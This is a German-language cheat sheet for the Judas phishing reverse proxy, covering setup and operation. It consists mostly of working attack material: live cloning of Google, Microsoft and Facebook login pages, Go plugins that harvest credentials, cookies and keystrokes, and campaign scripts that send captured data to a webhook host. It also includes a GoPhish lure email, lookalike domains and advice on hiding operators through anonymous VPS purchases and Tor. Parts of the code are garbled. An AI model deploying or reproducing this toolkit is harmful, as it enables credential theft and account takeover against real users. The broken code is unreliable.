Judas Phishing Proxy Cheat Blatt¶
Überblick¶
Judas ist eine steckbare Phishing-Proxy entwickelt von joncooperworks, die sich auf Echtzeit-Website Klonen durch umgekehrte Proxy-Funktionalität spezialisiert. Im Gegensatz zu statischen Phishing-Seiten erzeugt Judas dynamische Klone, die das Verhalten der Ziel-Website widerspiegeln, einschließlich JavaScript-Ausführung, Formulareinreichungen und Sitzungsmanagement. Dies macht es besonders effektiv, moderne Sicherheitsmaßnahmen zu umgehen und überzeugende Phishing-Kampagnen zu schaffen.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Verwendung gegen jedes Ziel haben.
Installation¶
Voraussetzungen¶
```bash
Install Go 1.16+ and Git¶
sudo apt update sudo apt install -y golang-go git build-essential
Verify Go installation¶
go version
Set Go environment variables¶
export GOPATH=\(HOME/go export PATH=\)PATH:$GOPATH/bin export GO111MODULE=on ```_
Installation von GitHub¶
```bash
Clone Judas repository¶
git clone https://github.com/joncooperworks/judas.git cd judas
Build Judas¶
go build -o judas cmd/judas/main.go
Install to system path¶
sudo mv judas /usr/local/bin/
Verify installation¶
judas --help ```_
Go Module Installation¶
```bash
Install directly using go install¶
go install github.com/joncooperworks/judas/cmd/judas@latest
Verify installation¶
judas --help ```_
Docker Installation¶
```bash
Clone repository¶
git clone https://github.com/joncooperworks/judas.git cd judas
Build Docker image¶
docker build -t judas .
Run Judas container¶
docker run -it --rm -p 8080:8080 judas --target https://example.com --address 0.0.0.0:8080
Run with SSL certificates¶
docker run -it --rm -p 443:443 -v $(pwd)/certs:/certs judas \ --target https://example.com \ --address 0.0.0.0:443 \ --ssl-cert /certs/cert.pem \ --ssl-key /certs/key.pem ```_
Handbuch Bau¶
```bash
Download source code¶
wget https://github.com/joncooperworks/judas/archive/main.zip unzip main.zip cd judas-main
Install dependencies¶
go mod download
Build binary¶
go build -ldflags="-s -w" -o judas cmd/judas/main.go
Set permissions¶
chmod +x judas ```_
Basisnutzung¶
Einfache Website Cloning¶
```bash
Clone a website on localhost¶
judas --target https://example.com --address localhost:8080
Clone with custom listening address¶
judas --target https://login.microsoftonline.com --address 0.0.0.0:8080
Clone with SSL termination¶
judas --target https://accounts.google.com \ --address 0.0.0.0:443 \ --ssl-cert cert.pem \ --ssl-key key.pem
Clone with custom user agent¶
judas --target https://facebook.com \ --address localhost:8080 \ --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" ```_
Erweiterte Konfiguration¶
```bash
Clone with custom headers¶
judas --target https://example.com \ --address localhost:8080 \ --header "X-Forwarded-For: 192.168.1.100" \ --header "X-Real-IP: 192.168.1.100"
Clone with proxy support¶
judas --target https://example.com \ --address localhost:8080 \ --proxy http://proxy.example.com:8080
Clone with custom timeout¶
judas --target https://example.com \ --address localhost:8080 \ --timeout 30s
Clone with verbose logging¶
judas --target https://example.com \ --address localhost:8080 \ --verbose ```_
SSL/TLS Konfiguration¶
```bash
Generate self-signed certificates¶
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes \ -subj "/C=US/ST=State/L=City/O=Organization/CN=phishing.example.com"
Use Let's Encrypt certificates¶
certbot certonly --standalone -d phishing.example.com judas --target https://example.com \ --address 0.0.0.0:443 \ --ssl-cert /etc/letsencrypt/live/phishing.example.com/fullchain.pem \ --ssl-key /etc/letsencrypt/live/phishing.example.com/privkey.pem
Use custom CA certificates¶
judas --target https://example.com \ --address localhost:8080 \ --ca-cert custom-ca.pem ```_
Plugin-Entwicklung¶
Basic Plugin Struktur¶
```go // plugins/logger/logger.go package main
import ( "fmt" "log" "net/http" "time"
"github.com/joncooperworks/judas/pkg/judas"
)
// LoggerPlugin logs all requests and responses type LoggerPlugin struct \\{ logFile string \\}
// NewLoggerPlugin creates a new logger plugin func NewLoggerPlugin(logFile string) *LoggerPlugin \\{ return &LoggerPlugin;\\{ logFile: logFile, \\} \\}
// ProcessRequest processes incoming requests func (p *LoggerPlugin) ProcessRequest(req *http.Request) error \\{ log.Printf("[REQUEST] %s %s from %s", req.Method, req.URL.Path, req.RemoteAddr)
// Log form data
if req.Method == "POST" \\\\{
req.ParseForm()
for key, values := range req.PostForm \\\\{
for _, value := range values \\\\{
log.Printf("[FORM] %s: %s", key, value)
\\\\}
\\\\}
\\\\}
return nil
\\}
// ProcessResponse processes outgoing responses func (p *LoggerPlugin) ProcessResponse(resp *http.Response) error \\{ log.Printf("[RESPONSE] %d %s", resp.StatusCode, resp.Status) return nil \\}
// Name returns the plugin name func (p *LoggerPlugin) Name() string \\{ return "Logger" \\}
// Initialize sets up the plugin func (p *LoggerPlugin) Initialize() error \\{ log.Printf("Logger plugin initialized with log file: %s", p.logFile) return nil \\}
// Cleanup performs plugin cleanup func (p *LoggerPlugin) Cleanup() error \\{ log.Printf("Logger plugin cleanup completed") return nil \\}
// Plugin interface implementation var Plugin LoggerPlugin ```_
Credential Harvesting Plugin¶
```go // plugins/harvester/harvester.go package main
import ( "encoding/json" "fmt" "io/ioutil" "log" "net/http" "os" "time"
"github.com/joncooperworks/judas/pkg/judas"
)
// Credential represents captured credentials
type Credential struct \\{
Timestamp time.Time json:"timestamp"
IP string json:"ip"
UserAgent string json:"user_agent"
URL string json:"url"
Method string json:"method"
FormData map[string]string json:"form_data"
Headers map[string]string json:"headers"
Cookies map[string]string json:"cookies"
\\}
// HarvesterPlugin captures and stores credentials type HarvesterPlugin struct \\{ outputFile string webhookURL string credentials []Credential \\}
// NewHarvesterPlugin creates a new harvester plugin func NewHarvesterPlugin(outputFile, webhookURL string) *HarvesterPlugin \\{ return &HarvesterPlugin;\\{ outputFile: outputFile, webhookURL: webhookURL, credentials: make([]Credential, 0), \\} \\}
// ProcessRequest captures credentials from requests func (p *HarvesterPlugin) ProcessRequest(req *http.Request) error \\{ // Only process POST requests with form data if req.Method != "POST" \\{ return nil \\}
// Parse form data
err := req.ParseForm()
if err != nil \\\\{
return err
\\\\}
// Check if this looks like a login form
if p.isLoginForm(req.PostForm) \\\\{
credential := Credential\\\\{
Timestamp: time.Now(),
IP: p.getClientIP(req),
UserAgent: req.UserAgent(),
URL: req.URL.String(),
Method: req.Method,
FormData: make(map[string]string),
Headers: make(map[string]string),
Cookies: make(map[string]string),
\\\\}
// Capture form data
for key, values := range req.PostForm \\\\{
if len(values) > 0 \\\\{
credential.FormData[key] = values[0]
\\\\}
\\\\}
// Capture relevant headers
for key, values := range req.Header \\\\{
if len(values) > 0 && p.isRelevantHeader(key) \\\\{
credential.Headers[key] = values[0]
\\\\}
\\\\}
// Capture cookies
for _, cookie := range req.Cookies() \\\\{
credential.Cookies[cookie.Name] = cookie.Value
\\\\}
// Store credential
p.credentials = append(p.credentials, credential)
// Log capture
log.Printf("[HARVEST] Captured credentials from %s", credential.IP)
// Save to file
p.saveCredential(credential)
// Send webhook notification
if p.webhookURL != "" \\\\{
go p.sendWebhook(credential)
\\\\}
\\\\}
return nil
\\}
// isLoginForm checks if the form contains login-like fields func (p *HarvesterPlugin) isLoginForm(form map[string][]string) bool \\{ loginFields := []string\\{ "username", "email", "user", "login", "account", "password", "pass", "pwd", "passwd", \\}
for field := range form \\\\{
for _, loginField := range loginFields \\\\{
| | if field == loginField | | | | fmt.Sprintf("%s", field) == loginField \\{ return true \\} \\} \\}
return false
\\}
// getClientIP extracts the real client IP func (p *HarvesterPlugin) getClientIP(req *http.Request) string \\{ // Check X-Forwarded-For header if xff := req.Header.Get("X-Forwarded-For"); xff != "" \\{ return xff \\}
// Check X-Real-IP header
if xri := req.Header.Get("X-Real-IP"); xri != "" \\\\{
return xri
\\\\}
// Fall back to RemoteAddr
return req.RemoteAddr
\\}
// isRelevantHeader checks if a header is relevant for logging func (p *HarvesterPlugin) isRelevantHeader(header string) bool \\{ relevantHeaders := []string\\{ "User-Agent", "Accept", "Accept-Language", "Accept-Encoding", "Referer", "Origin", "X-Forwarded-For", "X-Real-IP", \\}
for _, relevant := range relevantHeaders \\\\{
if header == relevant \\\\{
return true
\\\\}
\\\\}
return false
\\}
// saveCredential saves credential to file func (p *HarvesterPlugin) saveCredential(credential Credential) \\{ | | file, err := os.OpenFile(p.outputFile, os.O_APPEND | os.O_CREATE | os.O_WRONLY, 0644) | | if err != nil \\{ log.Printf("Error opening output file: %v", err) return \\} defer file.Close()
// Write as JSON
data, err := json.Marshal(credential)
if err != nil \\\\{
log.Printf("Error marshaling credential: %v", err)
return
\\\\}
file.Write(data)
file.WriteString("\n")
\\}
// sendWebhook sends credential data to webhook func (p *HarvesterPlugin) sendWebhook(credential Credential) \\{ // Implementation for webhook notification // This would send the credential data to a remote endpoint log.Printf("Sending webhook notification for credential from %s", credential.IP) \\}
// ProcessResponse processes responses (not used for harvesting) func (p *HarvesterPlugin) ProcessResponse(resp *http.Response) error \\{ return nil \\}
// Name returns the plugin name func (p *HarvesterPlugin) Name() string \\{ return "Harvester" \\}
// Initialize sets up the plugin func (p *HarvesterPlugin) Initialize() error \\{ log.Printf("Harvester plugin initialized with output file: %s", p.outputFile) return nil \\}
// Cleanup performs plugin cleanup func (p *HarvesterPlugin) Cleanup() error \\{ log.Printf("Harvester plugin captured %d credentials", len(p.credentials)) return nil \\}
// Plugin interface implementation var Plugin HarvesterPlugin ```_
Inhaltsänderung Plugins¶
```go // plugins/modifier/modifier.go package main
import ( "bytes" "io/ioutil" "log" "net/http" "regexp" "strings"
"github.com/joncooperworks/judas/pkg/judas"
)
// ModifierPlugin modifies response content type ModifierPlugin struct \\{ replacements map[string]string injections []string \\}
// NewModifierPlugin creates a new modifier plugin func NewModifierPlugin() *ModifierPlugin \\{ return &ModifierPlugin;\\{ replacements: make(map[string]string), injections: make([]string, 0), \\} \\}
// AddReplacement adds a content replacement rule func (p *ModifierPlugin) AddReplacement(search, replace string) \\{ p.replacements[search] = replace \\}
// AddInjection adds content to inject func (p *ModifierPlugin) AddInjection(content string) \\{ p.injections = append(p.injections, content) \\}
// ProcessRequest processes requests (not used for modification) func (p *ModifierPlugin) ProcessRequest(req *http.Request) error \\{ return nil \\}
// ProcessResponse modifies response content func (p *ModifierPlugin) ProcessResponse(resp *http.Response) error \\{ // Only modify HTML content contentType := resp.Header.Get("Content-Type") if !strings.Contains(contentType, "text/html") \\{ return nil \\}
// Read response body
body, err := ioutil.ReadAll(resp.Body)
if err != nil \\\\{
return err
\\\\}
resp.Body.Close()
// Convert to string for modification
content := string(body)
// Apply replacements
for search, replace := range p.replacements \\\\{
content = strings.ReplaceAll(content, search, replace)
\\\\}
// Inject additional content
for _, injection := range p.injections \\\\{
// Inject before closing body tag
content = strings.ReplaceAll(content, "</body>", injection+"</body>")
\\\\}
// Add keylogger script
keyloggerScript := `
<script>
document.addEventListener('keydown', function(e) \\{
fetch('/log-keystroke', \\{
method: 'POST',
headers: \\{'Content-Type': 'application/json'\\},
body: JSON.stringify(\\{
key: e.key,
timestamp: Date.now(),
| | target: e.target.name | | e.target.id | | \}) \}).catch(() => \{\}); \}); ` content = strings.ReplaceAll(content, "", keyloggerScript+"")
// Update response body
resp.Body = ioutil.NopCloser(bytes.NewReader([]byte(content)))
resp.ContentLength = int64(len(content))
resp.Header.Set("Content-Length", fmt.Sprintf("%d", len(content)))
log.Printf("[MODIFY] Modified response content (%d bytes)", len(content))
return nil
\\}
// Name returns the plugin name func (p *ModifierPlugin) Name() string \\{ return "Modifier" \\}
// Initialize sets up the plugin func (p *ModifierPlugin) Initialize() error \\{ // Add default replacements p.AddReplacement("Sign In", "Sign In (Secure)") p.AddReplacement("Login", "Login (Verified)")
// Add tracking pixel
trackingPixel := `<img src="/track.gif" width="1" height="1" style="display:none;">`
p.AddInjection(trackingPixel)
log.Printf("Modifier plugin initialized with %d replacements and %d injections",
len(p.replacements), len(p.injections))
return nil
\\}
// Cleanup performs plugin cleanup func (p *ModifierPlugin) Cleanup() error \\{ log.Printf("Modifier plugin cleanup completed") return nil \\}
// Plugin interface implementation var Plugin ModifierPlugin ```_
Konfiguration und Bereitstellung¶
Datei konfigurieren¶
```yaml
judas.yaml¶
target: "https://accounts.google.com" address: "0.0.0.0:443" ssl_cert: "/etc/ssl/certs/cert.pem" ssl_key: "/etc/ssl/private/key.pem"
Proxy settings¶
proxy: "http://proxy.example.com:8080" timeout: "30s" user_agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
Headers to add¶
headers: - "X-Forwarded-For: 192.168.1.100" - "X-Real-IP: 192.168.1.100"
Plugins¶
plugins: - name: "logger" config: log_file: "/var/log/judas/access.log" - name: "harvester" config: output_file: "/var/log/judas/credentials.json" webhook_url: "https://your-server.com/webhook" - name: "modifier" config: replacements: "Sign In": "Sign In (Secure)" "Login": "Login (Verified)"
Logging¶
log_level: "info" log_file: "/var/log/judas/judas.log"
Security¶
rate_limit: 100 max_connections: 1000 ```_
Systemierter Service¶
```ini
/etc/systemd/system/judas.service¶
[Unit] Description=Judas Phishing Proxy After=network.target
[Service] Type=simple User=judas Group=judas WorkingDirectory=/opt/judas ExecStart=/usr/local/bin/judas --config /etc/judas/judas.yaml Restart=always RestartSec=5
Security settings¶
NoNewPrivileges=true PrivateTmp=true ProtectSystem=strict ProtectHome=true ReadWritePaths=/var/log/judas
[Install] WantedBy=multi-user.target ```_
Docker komponiert¶
```yaml
docker-compose.yml¶
version: '3.8'
services: judas: build: . ports: - "443:443" - "80:80" volumes: - ./certs:/certs:ro - ./logs:/logs - ./config:/config:ro environment: - JUDAS_TARGET=https://accounts.google.com - JUDAS_ADDRESS=0.0.0.0:443 - JUDAS_SSL_CERT=/certs/cert.pem - JUDAS_SSL_KEY=/certs/key.pem command: > judas --target $\\{JUDAS_TARGET\\} --address $\\{JUDAS_ADDRESS\\} --ssl-cert $\\{JUDAS_SSL_CERT\\} --ssl-key $\\{JUDAS_SSL_KEY\\} --config /config/judas.yaml restart: unless-stopped
nginx: image: nginx:alpine ports: - "8080:80" volumes: - ./nginx.conf:/etc/nginx/nginx.conf:ro depends_on: - judas restart: unless-stopped ```_
Nginx Reverse Proxy¶
```nginx
nginx.conf¶
events \\{ worker_connections 1024; \\}
http \\{ upstream judas \\{ server judas:443; \\}
server \\\\{
listen 80;
server_name phishing.example.com;
location / \\\\{
proxy_pass https://judas;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
# SSL settings
proxy_ssl_verify off;
proxy_ssl_session_reuse on;
\\\\}
# Logging
access_log /var/log/nginx/judas_access.log;
error_log /var/log/nginx/judas_error.log;
\\\\}
\\} ```_
Automatisierung und Schrift¶
Python Automation Script¶
```python
!/usr/bin/env python3¶
Judas automation script¶
import subprocess import time import json import os import requests import threading from datetime import datetime
class JudasAutomation: def init(self, target_url, listen_address="0.0.0.0:8080"): self.target_url = target_url self.listen_address = listen_address self.process = None self.monitoring = False self.webhook_url = "https://your-webhook-url.com/notify" self.log_file = "judas.log" self.credentials_file = "credentials.json"
def start_judas(self, ssl_cert=None, ssl_key=None):
"""Start Judas proxy"""
cmd = [
"judas",
"--target", self.target_url,
"--address", self.listen_address,
"--verbose"
]
if ssl_cert and ssl_key:
cmd.extend(["--ssl-cert", ssl_cert, "--ssl-key", ssl_key])
try:
self.process = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True
)
print(f"[+] Judas started with PID: \\\\{self.process.pid\\\\}")
print(f"[+] Target: \\\\{self.target_url\\\\}")
print(f"[+] Listening on: \\\\{self.listen_address\\\\}")
return True
except Exception as e:
print(f"[-] Failed to start Judas: \\\\{e\\\\}")
return False
def monitor_logs(self):
"""Monitor Judas logs for activity"""
self.monitoring = True
print("[+] Starting log monitoring...")
while self.monitoring:
try:
if self.process and self.process.poll() is None:
# Read stdout
line = self.process.stdout.readline()
if line:
self.process_log_line(line.strip())
time.sleep(0.1)
except Exception as e:
print(f"[-] Log monitoring error: \\\\{e\\\\}")
time.sleep(5)
def process_log_line(self, line):
"""Process individual log line"""
try:
# Log to file
with open(self.log_file, 'a') as f:
f.write(f"\\\\{datetime.now().isoformat()\\\\} - \\\\{line\\\\}\n")
# Check for credential capture
if "POST" in line and any(field in line.lower() for field in ["password", "username", "email"]):
print(f"[+] Potential credential capture: \\\\{line\\\\}")
self.send_notification(\\\\{
'type': 'credential_capture',
'log_line': line,
'timestamp': datetime.now().isoformat()
\\\\})
# Check for new connections
if "new connection" in line.lower():
print(f"[+] New victim connection: \\\\{line\\\\}")
self.send_notification(\\\\{
'type': 'new_connection',
'log_line': line,
'timestamp': datetime.now().isoformat()
\\\\})
except Exception as e:
print(f"[-] Error processing log line: \\\\{e\\\\}")
def send_notification(self, data):
"""Send webhook notification"""
try:
payload = \\\\{
'text': f"🎣 Judas Activity: \\\\{data['type']\\\\}",
'data': data
\\\\}
response = requests.post(
self.webhook_url,
json=payload,
timeout=10
)
if response.status_code == 200:
print("[+] Notification sent successfully")
else:
print(f"[-] Notification failed: \\\\{response.status_code\\\\}")
except Exception as e:
print(f"[-] Notification error: \\\\{e\\\\}")
def setup_ssl_certificates(self, domain):
"""Setup SSL certificates for domain"""
try:
# Generate self-signed certificate
cmd = [
"openssl", "req", "-x509", "-newkey", "rsa:4096",
"-keyout", "key.pem", "-out", "cert.pem",
"-days", "365", "-nodes",
"-subj", f"/C=US/ST=State/L=City/O=Organization/CN=\\\\{domain\\\\}"
]
result = subprocess.run(cmd, capture_output=True, text=True)
if result.returncode == 0:
print(f"[+] SSL certificates generated for \\\\{domain\\\\}")
return "cert.pem", "key.pem"
else:
print(f"[-] Failed to generate SSL certificates: \\\\{result.stderr\\\\}")
return None, None
except Exception as e:
print(f"[-] SSL certificate generation error: \\\\{e\\\\}")
return None, None
def setup_ngrok_tunnel(self):
"""Setup ngrok tunnel for public access"""
try:
port = self.listen_address.split(':')[1]
# Start ngrok tunnel
ngrok_process = subprocess.Popen([
"ngrok", "http", port
], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
time.sleep(5)
# Get public URL
response = requests.get("http://localhost:4040/api/tunnels")
if response.status_code == 200:
tunnels = response.json()['tunnels']
if tunnels:
public_url = tunnels[0]['public_url']
print(f"[+] Public URL: \\\\{public_url\\\\}")
return public_url, ngrok_process
except Exception as e:
print(f"[-] Failed to setup ngrok tunnel: \\\\{e\\\\}")
return None, None
def analyze_traffic(self):
"""Analyze captured traffic"""
try:
if not os.path.exists(self.log_file):
print("[-] No log file found")
return
with open(self.log_file, 'r') as f:
lines = f.readlines()
# Basic analysis
total_requests = len([line for line in lines if "HTTP" in line])
post_requests = len([line for line in lines if "POST" in line])
unique_ips = len(set([
line.split()[2] for line in lines
if len(line.split()) > 2 and "." in line.split()[2]
]))
# Generate report
report = \\\\{
'total_requests': total_requests,
'post_requests': post_requests,
'unique_ips': unique_ips,
'analysis_timestamp': datetime.now().isoformat()
\\\\}
# Save report
with open('traffic_analysis.json', 'w') as f:
json.dump(report, f, indent=2)
print(f"[+] Traffic analysis complete:")
print(f" Total requests: \\\\{total_requests\\\\}")
print(f" POST requests: \\\\{post_requests\\\\}")
print(f" Unique IPs: \\\\{unique_ips\\\\}")
print(f"[+] Report saved to: traffic_analysis.json")
except Exception as e:
print(f"[-] Traffic analysis error: \\\\{e\\\\}")
def run_campaign(self, duration_hours=1, use_ssl=False, domain=None):
"""Run complete phishing campaign"""
print("[+] Starting Judas phishing campaign...")
ssl_cert, ssl_key = None, None
# Setup SSL if requested
if use_ssl and domain:
ssl_cert, ssl_key = self.setup_ssl_certificates(domain)
if ssl_cert and ssl_key:
# Update listen address for HTTPS
self.listen_address = self.listen_address.replace(':8080', ':443')
# Setup ngrok tunnel
public_url, ngrok_process = self.setup_ngrok_tunnel()
# Start Judas
if not self.start_judas(ssl_cert, ssl_key):
return False
# Start monitoring in background thread
monitor_thread = threading.Thread(target=self.monitor_logs)
monitor_thread.daemon = True
monitor_thread.start()
# Send start notification
self.send_notification(\\\\{
'type': 'campaign_start',
'target': self.target_url,
'public_url': public_url,
'duration_hours': duration_hours
\\\\})
# Run for specified duration
print(f"[+] Campaign running for \\\\{duration_hours\\\\} hour(s)...")
time.sleep(duration_hours * 3600)
# Stop monitoring
self.monitoring = False
# Analyze traffic
self.analyze_traffic()
# Send completion notification
self.send_notification(\\\\{
'type': 'campaign_complete',
'target': self.target_url
\\\\})
# Cleanup
self.cleanup(ngrok_process)
print("[+] Campaign completed successfully")
return True
def cleanup(self, ngrok_process=None):
"""Cleanup processes and files"""
try:
if self.process and self.process.poll() is None:
self.process.terminate()
self.process.wait(timeout=10)
print("[+] Judas process terminated")
if ngrok_process and ngrok_process.poll() is None:
ngrok_process.terminate()
print("[+] Ngrok tunnel stopped")
# Final backup
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
if os.path.exists(self.log_file):
final_backup = f"judas_log_\\\\{timestamp\\\\}.txt"
os.rename(self.log_file, final_backup)
print(f"[+] Final log backup: \\\\{final_backup\\\\}")
except Exception as e:
print(f"[-] Cleanup error: \\\\{e\\\\}")
Usage example¶
def main(): # Configuration target_url = "https://accounts.google.com" listen_address = "0.0.0.0:8080" duration_hours = 1 use_ssl = True domain = "accounts-google-security.com"
# Create automation instance
automation = JudasAutomation(target_url, listen_address)
automation.webhook_url = "https://your-webhook-url.com/notify"
# Run campaign
success = automation.run_campaign(duration_hours, use_ssl, domain)
if success:
print("[+] Campaign completed successfully")
else:
print("[-] Campaign failed")
if name == "main": main() ```_
Bash Automation Script¶
```bash
!/bin/bash¶
Judas bash automation script¶
TARGET_URL="https://accounts.google.com" LISTEN_ADDRESS="0.0.0.0:8080" DURATION="3600" # 1 hour USE_SSL="true" DOMAIN="accounts-google-security.com"
Function to start Judas¶
start_judas() \\{ echo "[+] Starting Judas proxy..."
local cmd="judas --target $TARGET_URL --address $LISTEN_ADDRESS --verbose"
if [ "$USE_SSL" = "true" ]; then
# Generate SSL certificates
generate_ssl_certificates
cmd="$cmd --ssl-cert cert.pem --ssl-key key.pem"
fi
# Start Judas in background
$cmd > judas.log 2>&1 &
JUDAS_PID=$!
sleep 5
if kill -0 "$JUDAS_PID" 2>/dev/null; then
echo "[+] Judas started successfully (PID: $JUDAS_PID)"
return 0
else
echo "[-] Failed to start Judas"
return 1
fi
\\}
Function to generate SSL certificates¶
generate_ssl_certificates() \\{ echo "[+] Generating SSL certificates for $DOMAIN..."
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes \
-subj "/C=US/ST=State/L=City/O=Organization/CN=$DOMAIN" 2>/dev/null
if [ $? -eq 0 ]; then
echo "[+] SSL certificates generated successfully"
else
echo "[-] Failed to generate SSL certificates"
fi
\\}
Function to setup ngrok tunnel¶
setup_ngrok() \\{ echo "[+] Setting up ngrok tunnel..."
local port=$(echo "$LISTEN_ADDRESS"|cut -d':' -f2)
ngrok http "$port" > /dev/null 2>&1 &
NGROK_PID=$!
sleep 5
# Get public URL
PUBLIC_URL=$(curl -s http://localhost:4040/api/tunnels|jq -r '.tunnels[0].public_url')
if [ "$PUBLIC_URL" != "null" ] && [ -n "$PUBLIC_URL" ]; then
echo "[+] Public URL: $PUBLIC_URL"
echo "$PUBLIC_URL" > ngrok_url.txt
return 0
else
echo "[-] Failed to get ngrok URL"
return 1
fi
\\}
Function to monitor logs¶
monitor_logs() \\{ echo "[+] Starting log monitoring..."
tail -f judas.log|while read line; do
echo "[LOG] $line"
# Check for credential capture
| | if echo "\(line" | grep -qi "POST.*password\ | POST.*username\ | POST.*email"; then | | echo "[+] Potential credential capture detected" send_notification "credential_capture" "\)line" fi
# Check for new connections
if echo "$line"|grep -qi "new connection"; then
echo "[+] New victim connection"
send_notification "new_connection" "$line"
fi
done &
MONITOR_PID=$!
\\}
Function to send notifications¶
send_notification() \\{ local type="\(1" local data="\)2" local webhook_url="https://your-webhook-url.com/notify"
if command -v curl &> /dev/null; then
curl -X POST -H "Content-Type: application/json" \
-d "\\\\{\"text\":\"🎣 Judas Activity: $type\", \"data\":\"$data\"\\\\}" \
"$webhook_url" 2>/dev/null
fi
\\}
Function to analyze traffic¶
analyze_traffic() \\{ echo "[+] Analyzing captured traffic..."
if [ ! -f "judas.log" ]; then
echo "[-] No log file found"
return
fi
local total_requests=$(grep -c "HTTP" judas.log)
local post_requests=$(grep -c "POST" judas.log)
| | local unique_ips=$(grep -oP '\d+.\d+.\d+.\d+' judas.log | sort -u | wc -l) | |
echo "[+] Traffic analysis results:"
echo " Total requests: $total_requests"
echo " POST requests: $post_requests"
echo " Unique IPs: $unique_ips"
# Save analysis to file
cat > traffic_analysis.txt << EOF
Traffic Analysis Report Generated: $(date) Target: $TARGET_URL Duration: $DURATION seconds
Total requests: $total_requests POST requests: $post_requests Unique IPs: $unique_ips EOF
echo "[+] Analysis saved to: traffic_analysis.txt"
\\}
Function to cleanup¶
cleanup() \\{ echo "[+] Cleaning up..."
if [ -n "$JUDAS_PID" ]; then
kill "$JUDAS_PID" 2>/dev/null
echo "[+] Judas stopped"
fi
if [ -n "$NGROK_PID" ]; then
kill "$NGROK_PID" 2>/dev/null
echo "[+] Ngrok tunnel stopped"
fi
if [ -n "$MONITOR_PID" ]; then
kill "$MONITOR_PID" 2>/dev/null
echo "[+] Log monitoring stopped"
fi
# Final backup
if [ -f "judas.log" ]; then
local timestamp=$(date +"%Y%m%d_%H%M%S")
cp judas.log "judas_log_$timestamp.txt"
echo "[+] Final log backup: judas_log_$timestamp.txt"
fi
exit 0
\\}
Set trap for cleanup¶
trap cleanup SIGINT SIGTERM
Main execution¶
main() \\{ echo "[+] Judas Automation Script" echo "[+] Target: $TARGET_URL" echo "[+] Listen Address: $LISTEN_ADDRESS" echo "[+] Duration: $DURATION seconds" echo "[+] SSL: $USE_SSL"
# Check dependencies
for cmd in judas openssl curl jq; do
if ! command -v "$cmd" &> /dev/null; then
echo "[-] Required command not found: $cmd"
exit 1
fi
done
# Setup ngrok tunnel
if setup_ngrok; then
# Start Judas
if start_judas; then
# Start log monitoring
monitor_logs
# Send start notification
send_notification "campaign_start" "Target: $TARGET_URL, Duration: $DURATION seconds"
# Run for specified duration
echo "[+] Campaign running for $DURATION seconds..."
sleep "$DURATION"
# Analyze traffic
analyze_traffic
# Send completion notification
send_notification "campaign_complete" "Target: $TARGET_URL"
fi
fi
cleanup
\\}
Execute main function¶
main ```_
Integration mit anderen Tools¶
GoPhys Integration¶
```python
Integrate Judas with GoPhish for email delivery¶
import requests import json
class GoPhishJudasIntegration: def init(self, gophish_url, gophish_api_key, judas_url): self.gophish_url = gophish_url self.gophish_api_key = gophish_api_key self.judas_url = judas_url self.headers = \\{ 'Authorization': f'Bearer \\{gophish_api_key\\}', 'Content-Type': 'application/json' \\}
def create_gophish_campaign(self):
"""Create GoPhish campaign with Judas URL"""
campaign_data = \\\\{
"name": "Judas Proxy Campaign",
"template": \\\\{
"name": "Account Security Alert",
"subject": "Immediate Action Required: Verify Your Account",
"html": f"""
<html>
<body>
<h2>Security Alert</h2>
<p>We've detected unusual activity on your account that requires immediate attention.</p>
<p>Please verify your identity to secure your account:</p>
<p><a href="\\\\{self.judas_url\\\\}" style="background-color: #1a73e8; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px;">Verify Account Now</a></p>
<p>This verification link will expire in 24 hours.</p>
<p>If you did not request this verification, please contact support immediately.</p>
</body>
</html>
""",
"text": f"Please verify your account by visiting: \\\\{self.judas_url\\\\}"
\\\\},
"page": \\\\{
"name": "Judas Redirect",
"html": f'<script>window.location.href="\\\\{self.judas_url\\\\}";</script>',
"redirect_url": self.judas_url
\\\\}
\\\\}
response = requests.post(
f"\\\\{self.gophish_url\\\\}/api/campaigns",
headers=self.headers,
json=campaign_data
)
return response.json()
Usage¶
integration = GoPhishJudasIntegration( "http://localhost:3333", "your_gophish_api_key", "https://your-judas-proxy.com" )
campaign = integration.create_gophish_campaign() ```_
Metasploit Integration¶
```bash
Use Judas for credential harvesting, then pivot to Metasploit¶
After capturing credentials through Judas, use them in Metasploit¶
Example: Use captured credentials for further exploitation¶
use auxiliary/scanner/http/http_login set RHOSTS target-server.com set USERNAME captured_username set PASSWORD captured_password run
Use captured session cookies¶
use auxiliary/scanner/http/cookie_replay set COOKIE "captured_session_cookie" set RHOSTS target.com run ```_
EvilGinx2 Integration¶
```bash
Combine Judas with EvilGinx2 for advanced phishing¶
Use Judas for initial website cloning¶
Use EvilGinx2 for 2FA bypass and session management¶
Start Judas for website cloning¶
judas --target https://accounts.google.com --address localhost:8080
Configure EvilGinx2 to use Judas as upstream¶
This allows combining real-time cloning with 2FA bypass¶
```_
Operationelle Sicherheit¶
Sicherheit der Infrastruktur¶
```bash
Use VPS with anonymous payment¶
Setup through Tor/VPN¶
Use legitimate domain names¶
Implement proper SSL certificates¶
Example secure deployment¶
1. Purchase VPS with cryptocurrency¶
2. Access through Tor browser¶
3. Register domain with privacy protection¶
4. Setup Let's Encrypt SSL¶
5. Configure proper logging and monitoring¶
```_
Domain und SSL Setup¶
```bash
Register legitimate-looking domain¶
Example: accounts-google-verification.com¶
Setup Let's Encrypt SSL¶
certbot certonly --standalone -d your-domain.com
Use with Judas¶
judas --target https://accounts.google.com \ --address 0.0.0.0:443 \ --ssl-cert /etc/letsencrypt/live/your-domain.com/fullchain.pem \ --ssl-key /etc/letsencrypt/live/your-domain.com/privkey.pem ```_
Verkehrsobfukation¶
```bash
Use CDN services (CloudFlare, AWS CloudFront)¶
Implement realistic timing delays¶
Use common ports (80, 443)¶
Mimic legitimate traffic patterns¶
Example CloudFlare setup¶
1. Add domain to CloudFlare¶
